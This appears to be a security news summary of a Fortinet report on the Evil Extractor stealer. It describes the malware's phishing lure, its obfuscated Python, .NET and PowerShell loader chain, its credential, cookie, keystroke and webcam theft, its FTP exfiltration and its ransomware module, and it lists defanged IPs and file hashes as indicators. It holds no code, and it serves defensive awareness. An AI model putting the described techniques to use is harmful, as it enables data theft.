
Researchers have spotted a stealer malware named as Evil Extractor (originally marketed as an educational tool) is being marketed for sale for other threat actors to steal data and files from Windows systems.
It has several modules that all work via an FTP service, it also contains environment checking and Anti-VM functions. Its primarily focuses steal browser data and information from compromised endpoints and then upload it to the attacker’s FTP server. Majority of the victims located in Europe and the U.S.
Sold by an actor named Kodex, Â it’s continually updates and packs in various modules to siphon system metadata, passwords, and cookies from various web browsers as well as record keystrokes and even act as a ransomware by encrypting files on the target system.
As a part of the new campaign, the malware has been used as part of a phishing emails that lure recipients into launching an executable that masquerades as a PDF document under the pretext of confirming their account details.
The Account_Info.exe binary is an obfuscated Python program designed to launch a .NET loader that uses a Base64-encoded PowerShell script to launch Evil Extractor. The malware, besides gathering files, can also activate the webcam and capture screenshots.
The report concluded stating, Evil Extractor is being used as a comprehensive info stealer with multiple malicious features, including ransomware. Its PowerShell script can elude detection in a .NET loader or PyArmor.
This research was documented by researchers from Fortinet
Indicators of Compromise
- 45[.]87[.]81[.]184
- 193[.]42[.]33[.]232
- 352efd1645982b8d23a841107007c8b4b024eb6bb5d6b312e5783ce4aa62b685
- 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e
- 75688c32a3c1f04df0fc02491180c8079d7fdc0babed981f5860f22f5e118a5e
- 826c7c112dd1ae80469ef81f5066003d7691a349e6234c8f8ca9637b0984fc45
- b1ef1654839b73f03b73c4ef4e20ce4ecdef2236ec6e1ca36881438bc1758dcd
- 17672795fb0c8df81ab33f5403e0e8ed15f4b2ac1e8ac9fef1fec4928387a36d